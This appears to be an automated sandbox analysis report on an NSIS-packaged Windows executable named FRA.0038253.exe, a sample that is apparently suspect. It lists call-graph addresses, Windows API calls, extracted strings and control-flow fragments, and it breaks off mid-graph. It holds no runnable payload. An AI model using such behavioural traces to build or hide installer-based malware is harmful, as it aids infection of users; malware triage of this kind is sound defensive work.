5945 402c3c 21 API calls 5944->5945 5945->5950 5946->5950 5950->5947 5952 4061b5 wsprintfA 5950->5952 5951->5947 5952->5947 4293 401fa0 4294 402c5e 21 API calls 4293->4294 4295 401fa6 4294->4295 4296 40539b 28 API calls 4295->4296 4297 401fb0 4296->4297 4308 4058f0 CreateProcessA 4297->4308 4300 401fd7 CloseHandle 4304 4027ed 4300->4304 4303 401fcb 4305 401fd0 4303->4305 4306 401fd9 4303->4306 4316 4061b5 wsprintfA 4305->4316 4306->4300 4309 405923 CloseHandle 4308->4309 4310 401fb6 4308->4310 4309->4310 4310->4300 4310->4304 4311 4066f4 WaitForSingleObject 4310->4311 4312 40670e 4311->4312 4313 406720 GetExitCodeProcess 4312->4313 4317 4066bb 4312->4317 4313->4303 4316->4300 4318 4066d8 PeekMessageA 4317->4318 4319 4066e8 WaitForSingleObject 4318->4319 4320 4066ce DispatchMessageA 4318->4320 4319->4312 4320->4318 5953 402020 5954 402c5e 21 API calls 5953->5954 5955 402027 5954->5955 5956 40667f 5 API calls 5955->5956 5957 402036 5956->5957 5958 4020be 5957->5958 5959 40204e GlobalAlloc 5957->5959 5959->5958 5960 402062 5959->5960 5961 40667f 5 API calls 5960->5961 5962 402069 5961->5962 5963 40667f 5 API calls 5962->5963 5964 402073 5963->5964 5964->5958 5968 4061b5 wsprintfA 5964->5968 5966 4020ae 5969 4061b5 wsprintfA 5966->5969 5968->5966 5969->5958 4325 4033a2 SetErrorMode GetVersionExA 4326 4033f4 GetVersionExA 4325->4326 4328 403433 4325->4328 4327 403410 4326->4327 4326->4328 4327->4328 4329 4034b7 4328->4329 4330 40667f 5 API calls 4328->4330 4331 406611 3 API calls 4329->4331 4330->4329 4332 4034cd lstrlenA 4331->4332 4332->4329 4333 4034dd 4332->4333 4334 40667f 5 API calls 4333->4334 4335 4034e4 4334->4335 4336 40667f 5 API calls 4335->4336 4337 4034eb 4336->4337 4338 40667f 5 API calls 4337->4338 4339 4034f7 #17 OleInitialize SHGetFileInfoA 4338->4339 4414 406257 lstrcpynA 4339->4414 4342 403545 GetCommandLineA 4415 406257 lstrcpynA 4342->4415 4344 403557 4345 405c14 CharNextA 4344->4345 4346 40357e CharNextA 4345->4346 4354 40358d 4346->4354 4347 403653 4348 403667 GetTempPathA 4347->4348 4416 403371 4348->4416 4350 40367f 4351 403683 GetWindowsDirectoryA lstrcatA 4350->4351 4352 4036d9 DeleteFileA 4350->4352 4355 403371 12 API calls 4351->4355 4426 402f31 GetTickCount GetModuleFileNameA 4352->4426 4353 405c14 CharNextA 4353->4354 4354->4347 4354->4353 4358 403655 4354->4358 4357 40369f 4355->4357 4357->4352 4361 4036a3 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4357->4361 4510 406257 lstrcpynA 4358->4510 4359 4036ec 4367 405c14 CharNextA 4359->4367 4396 403771 4359->4396 4406 403781 4359->4406 4363 403371 12 API calls 4361->4363 4365 4036d1 4363->4365 4365->4352 4365->4406 4368 403706 4367->4368 4376 4037b0 4368->4376 4377 40374b 4368->4377 4369 4038f2 4371 403970 ExitProcess 4369->4371 4372 4038fa GetCurrentProcess OpenProcessToken 4369->4372 4370 40379b 4534 40596d 4370->4534 4374 403940 4372->4374 4375 403911 LookupPrivilegeValueA AdjustTokenPrivileges 4372->4375 4380 40667f 5 API calls 4374->4380 4375->4374 4382 4058d8 5 API calls 4376->4382 4511 405cd7 4377->4511 4390 403947 4380->4390 4384 4037b5 lstrlenA 4382->4384 4538 406257 lstrcpynA 4384->4538 4385 40395c ExitWindowsEx 4385->4371 4387 403969 4385->4387 4588 40140b 4387->4588 4389 4037cd 4393 4037e5 4389->4393 4539 406257 lstrcpynA 4389->4539 4390->4385 4390->4387 4392 403766 4526 406257 lstrcpynA 4392->4526 4397 403803 wsprintfA 4393->4397 4411 403831 4393->4411 4454 403a60 4396->4454 4398 4062ea 21 API calls 4397->4398 4398->4393 4399 405861 2 API calls 4399->4411 4400 4058bb 2 API calls 4400->4411 4401 403841 GetFileAttributesA 4404 40384d DeleteFileA 4401->4404 4401->4411 4402 403879 SetCurrentDirectoryA 4581 406030 MoveFileExA 4402->4581 4404->4411 4527 403986 4406->4527 4408 406030 40 API calls 4408->4411 4409 4062ea 21 API calls 4409->4411 4410 4058f0 2 API calls 4410->4411 4411->4393 4411->4397 4411->4399 4411->4400 4411->4401 4411->4402 4411->4406 4411->4408 4411->4409 4411->4410 4412 4038e2 CloseHandle 4411->4412 4540 405a19 4411->4540 4585 4065ea FindFirstFileA 4411->4585 4412->4406 4414->4342 4415->4344 4417 406551 5 API calls 4416->4417 4419 40337d 4417->4419 4418 403387 4418->4350 4419->4418 4591 405be9 lstrlenA CharPrevA 4419->4591 4422 4058bb 2 API calls 4423 403395 4422->4423 4594 405e19 4423->4594 4598 405dea GetFileAttributesA CreateFileA 4426->4598 4428 402f71 4447 402f81 4428->4447 4599 406257 lstrcpynA 4428->4599 4430 402f97 4600 405c30 lstrlenA 4430->4600 4434 402fa8 GetFileSize 4435 4030a2 4434->4435 4453 402fbf 4434->4453 4605 402ecd 4435->4605 4437 4030ab 4439 4030db GlobalAlloc 4437->4439 4437->4447 4641 40335a SetFilePointer 4437->4641 4616 40335a SetFilePointer 4439->4616 4442 40310e 4444 402ecd 6 API calls 4442->4444 4443 4030f6 4617 403168 4443->4617 4444->4447 4445 4030c4 4448 403344 ReadFile 4445->4448 4447->4359 4450 4030cf 4448->4450 4449 402ecd 6 API calls 4449->4453 4450->4439 4450->4447 4451 403102 4451->4447 4451->4451 4452 40313f SetFilePointer 4451->4452 4452->4447 4453->4435 4453->4442 4453->4447 4453->4449 4638 403344 4453->4638 4455 40667f 5 API calls 4454->4455 4456 403a74 4455->4456 4457 403a7a 4456->4457 4458 403a8c 4456->4458 4669 4061b5 wsprintfA 4457->4669 4459 40613e 3 API calls 4458->4459 4460 403ab7 4459->4460 4461 403ad5 lstrcatA 4460->4461 4463 40613e 3 API calls 4460->4463 4464 403a8a 4461->4464 4463->4461 4654 403d25 4464->4654 4467 405cd7 18 API calls 4468 403b07 4467->4468 4469 403b90 4468->4469 4471 40613e 3 API calls 4468->4471 4470 405cd7 18 API calls 4469->4470 4472 403b96 4470->4472 4474 403b33 4471->4474 4473 403ba6 LoadImageA 4472->4473 4475 4062ea 21 API calls 4472->4475 4476 403c4c 4473->4476 4477 403bcd RegisterClassA 4473->4477 4474->4469 4478 403b4f lstrlenA 4474->4478 4481 405c14 CharNextA 4474->4481 4475->4473 4480 40140b 2 API calls 4476->4480 4479 403c03 SystemParametersInfoA CreateWindowExA 4477->4479 4509 403c56 4477->4509 4482 403b83 4478->4482 4483 403b5d lstrcmpiA 4478->4483 4479->4476 4484 403c52 4480->4484 4485 403b4d 4481->4485 4487 405be9 3 API calls 4482->4487 4483->4482 4486 403b6d GetFileAttributesA 4483->4486 4489 403d25 22 API calls 4484->4489 4484->4509 4485->4478 4488 403b79 4486->4488 4490 403b89 4487->4490 4488->4482 4491 405c30 2 API calls 4488->4491 4492 403c63 4489->4492 4670 406257 lstrcpynA 4490->4670 4491->4482 4494 403cf2 4492->4494 4495 403c6f ShowWindow 4492->4495 4662 40546d OleInitialize 4494->4662 4497 406611 3 API calls 4495->4497 4499 403c87 4497->4499 4498 403cf8 4500 403d14 4498->4500 4501 403cfc 4498->4501 4502 403c95 GetClassInfoA 4499->4502 4504 406611 3 API calls 4499->4504 4503 40140b 2 API calls 4500->4503 4508 40140b 2 API calls 4501->4508 4501->4509 4505 403ca9 GetClassInfoA RegisterClassA 4502->4505 4506 403cbf DialogBoxParamA 4502->4506 4503->4509 4504->4502 4505->4506 4507 40140b 2 API calls 4506->4507 4507->4509 4508->4509 4509->4406 4510->4348 4682 406257 lstrcpynA 4511->4682 4513 405ce8 4514 405c82 4 API calls 4513->4514 4515 405cee 4514->4515 4516 403757 4515->4516 4517 406551 5 API calls 4515->4517 4516->4406 4525 406257 lstrcpynA 4516->4525 4523 405cfe 4517->4523 4518 405d29 lstrlenA 4519 405d34 4518->4519 4518->4523 4520 405be9 3 API calls 4519->4520 4522 405d39 GetFileAttributesA 4520->4522 4521 4065ea 2 API calls 4521->4523 4522->4516 4523->4516 4523->4518 4523->4521 4524 405c30 2 API calls 4523->4524 4524->4518 4525->4392 4526->4396 4528 403990 CloseHandle 4527->4528 4529 40399e 4527->4529 4528->4529 4683 4039cb 4529->4683 4532 405a19 71 API calls 4533 403789 OleUninitialize 4532->4533 4533->4369 4533->4370 4536 405982 4534->4536 4535 4037a8 ExitProcess 4536->4535 4537 405996 MessageBoxIndirectA 4536->4537 4537->4535 4538->4389 4539->4393 4541 405cd7 18 API calls 4540->4541 4542 405a39 4541->4542 4543 405a41 DeleteFileA 4542->4543 4544 405a58 4542->4544 4545 405b9c 4543->4545 4547 405b90 4544->4547 4687 406257 lstrcpynA 4544->4687 4545->4411 4547->4545 4553 4065ea 2 API calls 4547->4553 4548 405a7e 4549 405a91 4548->4549 4550 405a84 lstrcatA 4548->4550 4552 405c30 2 API calls 4549->4552 4551 405a97 4550->4551 4554 405aa5 lstrcatA 4551->4554 4555 405a9c 4551->4555 4552->4551 4556 405baa 4553->4556 4558 405ab0 lstrlenA FindFirstFileA 4554->4558 4555->4554 4555->4558 4556->4545 4557 405bae 4556->4557 4559 405be9 3 API calls 4557->4559 4560 405b86 4558->4560 4579 405ad4 4558->4579 4561 405bb4 4559->4561 4560->4547 4563 4059d1 5 API calls 4561->4563 4562 405c14 CharNextA 4562->4579 4564 405bc0 4563->4564 4565 405bc4 4564->4565 4566 405bda 4564->4566 4565->4545 4571 40539b 28 API calls 4565->4571 4569 40539b 28 API calls 4566->4569 4567 405b65 FindNextFileA 4570 405b7d FindClose 4567->4570 4567->4579 4569->4545 4570->4560 4572 405bd1 4571->4572 4573 406030 40 API calls 4572->4573 4576 405bd8 4573->4576 4575 405a19 64 API calls 4575->4579 4576->4545 4577 40539b 28 API calls 4577->4567 4578 40539b 28 API calls 4578->4579 4579->4562 4579->4567 4579->4575 4579->4577 4579->4578 4580 406030 40 API calls 4579->4580 4688 406257 lstrcpynA 4579->4688 4689 4059d1 4579->4689 4580->4579 4582 403888 CopyFileA 4581->4582 4583 406044 4581->4583 4582->4406 4582->4411 4700 405ec0 4583->4700 4586 406600 FindClose 4585->4586 4587 40660b 4585->4587 4586->4587 4587->4411 4589 401389 2 API calls 4588->4589 4590 401420 4589->4590 4590->4371 4592 405c03 lstrcatA 4591->4592 4593 40338f 4591->4593 4592->4593 4593->4422 4595 405e24 GetTickCount GetTempFileNameA 4594->4595 4596 405e51 4595->4596 4597 4033a0 4595->4597 4596->4595 4596->4597 4597->4350 4598->4428 4599->4430 4601 405c3d 4600->4601 4602 405c42 CharPrevA 4601->4602 4603 402f9d 4601->4603 4602->4601 4602->4603 4604 406257 lstrcpynA 4603->4604 4604->4434 4606 402ed6 4605->4606 4607 402eee 4605->4607 4610 402ee6 4606->4610 4611 402edf DestroyWindow 4606->4611 4608 402ef6 4607->4608 4609 402efe GetTickCount 4607->4609 4612 4066bb 2 API calls 4608->4612 4613 402f0c CreateDialogParamA ShowWindow 4609->4613 4614 402f2f 4609->4614 4610->4437 4611->4610 4615 402efc 4612->4615 4613->4614 4614->4437 4615->4437 4616->4443 4618 40317e 4617->4618 4619 4031a9 4618->4619 4651 40335a SetFilePointer 4618->4651 4621 403344 ReadFile 4619->4621 4622 4031b4 4621->4622 4623 4032e4 4622->4623 4624 4031c6 GetTickCount 4622->4624 4627 4032ce 4622->4627 4625 4032e8 4623->4625 4630 403300 4623->4630 4634 4031d9 4624->4634 4626 403344 ReadFile 4625->4626 4626->4627 4627->4451 4628 403344 ReadFile 4628->4630 4629 403344 ReadFile 4629->4634 4630->4627 4630->4628 4631 405e91 WriteFile 4630->4631 4631->4630 4633 40323f GetTickCount 4633->4634 4634->4627 4634->4629 4634->4633 4635 403268 MulDiv wsprintfA 4634->4635 4642 4067c4 4634->4642 4649 405e91 WriteFile 4634->4649 4636 40539b 28 API calls 4635->4636 4636->4634 4652 405e62 ReadFile 4638->4652 4641->4445 4643 4067e9 4642->4643 4644 4067f1 4642->4644 4643->4634 4644->4643 4645 406881 GlobalAlloc 4644->4645 4646 406878 GlobalFree 4644->4646 4647 4068f8 GlobalAlloc 4644->4647 4648 4068ef GlobalFree 4644->4648 4645->4643 4645->4644 4646->4645 4647->4643 4647->4644 4648->4647 4650 405eaf 4649->4650 4650->4634 4651->4619 4653 403357 4652->4653 4653->4453 4655 403d39 4654->4655 4671 4061b5 wsprintfA 4655->4671 4657 403daa 4672 403dde 4657->4672 4659 403ae5 4659->4467 4660 403daf 4660->4659 4661 4062ea 21 API calls 4660->4661 4661->4660 4675 404343 4662->4675 4664 405490 4668 4054b7 4664->4668 4678 401389 4664->4678 4665 404343 SendMessageA 4666 4054c9 OleUninitialize 4665->4666 4666->4498 4668->4665 4669->4464 4670->4469 4671->4657 4673 4062ea 21 API calls 4672->4673 4674 403dec SetWindowTextA 4673->4674 4674->4660 4676 40435b 4675->4676 4677 40434c SendMessageA 4675->4677 4676->4664 4677->4676 4680 401390 4678->4680 4679 4013fe 4679->4664 4680->4679 4681 4013cb MulDiv SendMessageA 4680->4681 4681->4680 4682->4513 4684 4039d9 4683->4684 4685 4039a3 4684->4685 4686 4039de FreeLibrary GlobalFree 4684->4686 4685->4532 4686->4685 4686->4686 4687->4548 4688->4579 4697 405dc5 GetFileAttributesA 4689->4697 4692 4059fe 4692->4579 4693 4059f4 DeleteFileA 4695 4059fa 4693->4695 4694 4059ec RemoveDirectoryA 4694->4695 4695->4692 4696 405a0a SetFileAttributesA 4695->4696 4696->4692 4698 4059dd 4697->4698 4699 405dd7 SetFileAttributesA 4697->4699 4698->4692 4698->4693 4698->4694 4699->4698 4701 405ee6 4700->4701 4702 405f0c GetShortPathNameA 4700->4702 4727 405dea GetFileAttributesA CreateFileA 4701->4727 4704 405f21 4702->4704 4705 40602b 4702->4705 4704->4705 4707 405f29 wsprintfA 4704->4707 4705->4582 4706 405ef0 CloseHandle GetShortPathNameA 4706->4705 4708 405f04 4706->4708 4709 4062ea 21 API calls 4707->4709 4708->4702 4708->4705 4710 405f51 4709->4710 4728 405dea GetFileAttributesA CreateFileA 4710->4728 4712 405f5e 4712->4705 4713 405f6d GetFileSize GlobalAlloc 4712->4713 4714 406024 CloseHandle 4713->4714 4715 405f8f 4713->4715 4714->4705 4716 405e62 ReadFile 4715->4716 4717 405f97 4716->4717 4717->4714 4729 405d4f lstrlenA 4717->4729 4720 405fc2 4722 405d4f 4 API calls 4720->4722 4721 405fae lstrcpyA 4723 405fd0 4721->4723 4722->4723 4724 406007 SetFilePointer 4723->4724 4725 405e91 WriteFile 4724->4725 4726 40601d GlobalFree 4725->4726 4726->4714 4727->4706 4728->4712 4730 405d90 lstrlenA 4729->4730 4731 405d98 4730->4731 4732 405d69 lstrcmpiA 4730->4732 4731->4720 4731->4721 4732->4731 4733 405d87 CharNextA 4732->4733 4733->4730 5970 401922 5971 401959 5970->5971 5972 402c5e 21 API calls 5971->5972 5973 40195e 5972->5973 5974 405a19 71 API calls 5973->5974 5975 401967 5974->5975 4751 4024a3 4752 402c5e 21 API calls 4751->4752 4753 4024b5 4752->4753 4754 402c5e 21 API calls 4753->4754 4755 4024bf 4754->4755 4768 402cee 4755->4768 4758 402aea 4759 4024f4 4766 402500 4759->4766 4772 402c3c 4759->4772 4760 402c5e 21 API calls 4761 4024ed lstrlenA 4760->4761 4761->4759 4763 402522 RegSetValueExA 4765 402538 RegCloseKey 4763->4765 4764 403168 39 API calls 4764->4763 4765->4758 4766->4763 4766->4764 4769 402d09 4768->4769 4775 40610b 4769->4775 4773 4062ea 21 API calls 4772->4773 4774 402c51 4773->4774 4774->4766 4776 40611a 4775->4776 4777 4024cf 4776->4777 4778 406125 RegCreateKeyExA 4776->4778 4777->4758 4777->4759 4777->4760 4778->4777 5976 401d23 5977 402c3c 21 API calls 5976->5977 5978 401d29 IsWindow 5977->5978 5979 401a33 5978->5979 5980 401925 5981 402c5e 21 API calls 5980->5981 5982 40192c 5981->5982 5983 40596d MessageBoxIndirectA 5982->5983 5984 401935 5983->5984 5985 4027a5 5986 4027ab 5985->5986 5987 4027af FindNextFileA 5986->5987 5990 4027c1 5986->5990 5988 402800 5987->5988 5987->5990 5991 406257 lstrcpynA 5988->5991 5991->5990 5999 406fa9 6003 4067f7 5999->6003 6000 407162 6001 406881 GlobalAlloc 6001->6000 6001->6003 6002 406878 GlobalFree 6002->6001 6003->6000 6003->6001 6003->6002 6003->6003 6004 4068f8 GlobalAlloc 6003->6004 6005 4068ef GlobalFree 6003->6005 6004->6000 6004->6003 6005->6004 4985 401bac 4986 401bb9 4985->4986 4987 401bfd 4985->4987 4990 401c41 4986->4990 4993 401bd0 4986->4993 4988 401c01 4987->4988 4989 401c26 GlobalAlloc 4987->4989 5003 4023b4 4988->5003 5006 406257 lstrcpynA 4988->5006 4992 4062ea 21 API calls 4989->4992 4991 4062ea 21 API calls 4990->4991 4990->5003 4994 4023ae 4991->4994 4992->4990 5004 406257 lstrcpynA 4993->5004 4999 40596d MessageBoxIndirectA 4994->4999 4994->5003 4997 401c13 GlobalFree 4997->5003 4998 401bdf 5005 406257 lstrcpynA 4998->5005 4999->5003 5001 401bee 5007 406257 lstrcpynA 5001->5007 5004->4998 5005->5001 5006->4997 5007->5003 6006 40442d lstrcpynA lstrlenA 6007 4029af 6008 402c3c 21 API calls 6007->6008 6009 4029b5 6008->6009 6010 4062ea 21 API calls 6009->6010 6011 4027ed 6009->6011 6010->6011 6019 402631 6020 402c5e 21 API calls 6019->6020 6021 402638 6020->6021 6024 405dea GetFileAttributesA CreateFileA 6021->6024 6023 402644 6024->6023 5051 4025b5 5052 402c9e 21 API calls 5051->5052 5053 4025bf 5052->5053 5054 402c3c 21 API calls 5053->5054 5055 4025c8 5054->5055 5056 4025e3 RegEnumKeyA 5055->5056 5057 4025ef RegEnumValueA 5055->5057 5060 4027ed 5055->5060 5058 40260b RegCloseKey 5056->5058 5057->5058 5059 402604 5057->5059 5058->5060 5059->5058 6025 70751000 6026 7075101b 5 API calls 6025->6026 6027 70751019 6026->6027 6028 4014b7 6029 4014bd 6028->6029 6030 401389 2 API calls 6029->6030 6031 4014c5 6030->6031

                                                                          Executed Functions

                                                                          Function 004033A2 Relevance: 93.2, APIs: 32, Strings: 21, Instructions: 430stringfilecomCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 4033a2-4033f2 SetErrorMode GetVersionExA 1 403433 0->1 2 4033f4-40340e GetVersionExA 0->2 4 40343a 1->4 3 403410-40342f 2->3 2->4 3->1 5 40343c-403447 4->5 6 40345e-403465 4->6 7 403449-403458 5->7 8 40345a 5->8 9 403467 6->9 10 40346f-4034af 6->10 7->6 8->6 9->10 11 4034b1-4034b9 call 40667f 10->11 12 4034c2 10->12 11->12 17 4034bb 11->17 13 4034c7-4034db call 406611 lstrlenA 12->13 19 4034dd-4034f9 call 40667f * 3 13->19 17->12 26 40350a-40356a #17 OleInitialize SHGetFileInfoA call 406257 GetCommandLineA call 406257 19->26 27 4034fb-403501 19->27 34 403575-403588 call 405c14 CharNextA 26->34 35 40356c-403570 26->35 27->26 31 403503 27->31 31->26 38 403649-40364d 34->38 35->34 39 403653 38->39 40 40358d-403590 38->40 43 403667-403681 GetTempPathA call 403371 39->43 41 403592-403596 40->41 42 403598-40359f 40->42 41->41 41->42 45 4035a1-4035a2 42->45 46 4035a6-4035a9 42->46 52 403683-4036a1 GetWindowsDirectoryA lstrcatA call 403371 43->52 53 4036d9-4036f1 DeleteFileA call 402f31 43->53 45->46 47 40363a-403646 call 405c14 46->47 48 4035af-4035b3 46->48 47->38 67 403648 47->67 50 4035b5-4035bb 48->50 51 4035cb-4035f8 48->51 55 4035c1 50->55 56 4035bd-4035bf 50->56 57 40360a-403638 51->57 58 4035fa-403600 51->58 52->53 69 4036a3-4036d3 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 403371 52->69 70 403784-403795 call 403986 OleUninitialize 53->70 71 4036f7-4036fd 53->71 55->51 56->51 56->55 57->47 65 403655-403662 call 406257 57->65 62 403602-403604 58->62 63 403606 58->63 62->57 62->63 63->57 65->43 67->38 69->53 69->70 81 4038f2-4038f8 70->81 82 40379b-4037aa call 40596d ExitProcess 70->82 74 403775-40377c call 403a60 71->74 75 4036ff-40370a call 405c14 71->75 83 403781 74->83 86 403740-403749 75->86 87 40370c-403735 75->87 84 403970-403978 81->84 85 4038fa-40390f GetCurrentProcess OpenProcessToken 81->85 83->70 95 40397a 84->95 96 40397d-403980 ExitProcess 84->96 89 403940-40394e call 40667f 85->89 90 403911-40393a LookupPrivilegeValueA AdjustTokenPrivileges 85->90 92 4037b0-4037d4 call 4058d8 lstrlenA call 406257 86->92 93 40374b-403759 call 405cd7 86->93 91 403737-403739 87->91 104 403950-40395a 89->104 105 40395c-403967 ExitWindowsEx 89->105 90->89 91->86 98 40373b-40373e 91->98 114 4037e5-4037fa 92->114 115 4037d6-4037e0 call 406257 92->115 93->70 106 40375b-403771 call 406257 * 2 93->106 95->96 98->86 98->91 104->105 108 403969-40396b call 40140b 104->108 105->84 105->108 106->74 108->84 118 4037ff 114->118 115->114 120 403803-40382f wsprintfA call 4062ea 118->120 123 403831-403836 call 405861 120->123 124 403838 call 4058bb 120->124 128 40383d-40383f 123->128 124->128 129 403841-40384b GetFileAttributesA 128->129 130 403879-403898 SetCurrentDirectoryA call 406030 CopyFileA 128->130 132 40386a-403872 129->132 133 40384d-403856 DeleteFileA 129->133 130->70 137 40389e-4038bf call 406030 call 4062ea call 4058f0 130->137 132->118 136 403874 132->136 133->132 135 403858-403868 call 405a19 133->135 135->120 135->132 136->70 146 4038c1-4038c9 137->146 147 4038e2-4038ed CloseHandle 137->147 146->70 148 4038cf-4038d7 call 4065ea 146->148 147->70 148->120 151 4038dd 148->151 151->70
                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 004033C5
                                                                          • GetVersionExA.KERNEL32(?), ref: 004033EE
                                                                          • GetVersionExA.KERNEL32(0000009C), ref: 00403405
                                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034CE
                                                                          • #17.COMCTL32(?,00000008,0000000A,0000000C), ref: 0040350B
                                                                          • OleInitialize.OLE32(00000000), ref: 00403512
                                                                          • SHGetFileInfoA.SHELL32(0041F8E0,00000000,?,00000160,00000000,?,00000008,0000000A,0000000C), ref: 00403530
                                                                          • GetCommandLineA.KERNEL32(spidsmus,NSIS Error,?,00000008,0000000A,0000000C), ref: 00403545
                                                                          • CharNextA.USER32(00000000,"C:\Users\user\Desktop\FRA.0038253.exe",00000020,"C:\Users\user\Desktop\FRA.0038253.exe",00000000,?,00000008,0000000A,0000000C), ref: 0040357F
                                                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000008,0000000A,0000000C), ref: 00403678
                                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C), ref: 00403689
                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 00403695
                                                                          • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 004036A9
                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 004036B1
                                                                          • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 004036C2
                                                                          • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C), ref: 004036CA
                                                                          • DeleteFileA.KERNELBASE(1033,?,00000008,0000000A,0000000C), ref: 004036DE
                                                                          • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C), ref: 00403789
                                                                          • ExitProcess.KERNEL32 ref: 004037AA
                                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FRA.0038253.exe",00000000,?,?,00000008,0000000A,0000000C), ref: 004037B9
                                                                          • wsprintfA.USER32 ref: 00403810
                                                                          • GetFileAttributesA.KERNEL32(920,C:\Users\user\AppData\Local\Temp\,920,?,0000000C), ref: 00403842
                                                                          • DeleteFileA.KERNEL32(920), ref: 0040384E
                                                                          • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,920,?,0000000C), ref: 0040387A
                                                                          • CopyFileA.KERNEL32(C:\Users\user\Desktop\FRA.0038253.exe,920,00000001), ref: 00403890
                                                                          • CloseHandle.KERNEL32(00000000,00426800,00426800,?,920,00000000), ref: 004038E3
                                                                          • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C), ref: 00403900
                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403907
                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040391B
                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0040393A
                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 0040395F
                                                                          • ExitProcess.KERNEL32 ref: 00403980
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: File$Process$Exit$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCloseCommandCopyErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuewsprintf
                                                                          • String ID: "$"C:\Users\user\Desktop\FRA.0038253.exe"$1033$920$A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\mars\universaltang\reseek$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\mars\universaltang\reseek$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\FRA.0038253.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`Khw$spidsmus$~nsu%X.tmp
                                                                          • API String ID: 2956269667-2109710517
                                                                          • Opcode ID: 888e42e03041c9896479bb338c7f9ab60795f25b595a815076ba3b5ffddc8426
                                                                          • Instruction ID: 9fadc8101539d075edd42acb6db2faaacee932f39b19a2a7e6831d37722d48ca
                                                                          • Opcode Fuzzy Hash: 888e42e03041c9896479bb338c7f9ab60795f25b595a815076ba3b5ffddc8426
                                                                          • Instruction Fuzzy Hash: 4BF1F770A04254AADB21AFB59D49B6F7EB8AF41706F0440BFF541B61D2CB7C4A41CB2E
                                                                          Function 004054D9 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 152 4054d9-4054f5 153 405684-40568a 152->153 154 4054fb-4055c2 GetDlgItem * 3 call 40432c call 404c1d GetClientRect GetSystemMetrics SendMessageA * 2 152->154 156 4056b4-4056c0 153->156 157 40568c-4056ae GetDlgItem CreateThread CloseHandle 153->157 175 4055e0-4055e3 154->175 176 4055c4-4055de SendMessageA * 2 154->176 159 4056e2-4056e8 156->159 160 4056c2-4056c8 156->160 157->156 164 4056ea-4056f0 159->164 165 40573d-405740 159->165 162 405703-40570a call 40435e 160->162 163 4056ca-4056dd ShowWindow * 2 call 40432c 160->163 172 40570f-405713 162->172 163->159 169 4056f2-4056fe call 4042d0 164->169 170 405716-405726 ShowWindow 164->170 165->162 167 405742-405748 165->167 167->162 177 40574a-40575d SendMessageA 167->177 169->162 173 405736-405738 call 4042d0 170->173 174 405728-405731 call 40539b 170->174 173->165 174->173 181 4055f3-40560a call 4042f7 175->181 182 4055e5-4055f1 SendMessageA 175->182 176->175 183 405763-40578f CreatePopupMenu call 4062ea AppendMenuA 177->183 184 40585a-40585c 177->184 191 405640-405661 GetDlgItem SendMessageA 181->191 192 40560c-405620 ShowWindow 181->192 182->181 189 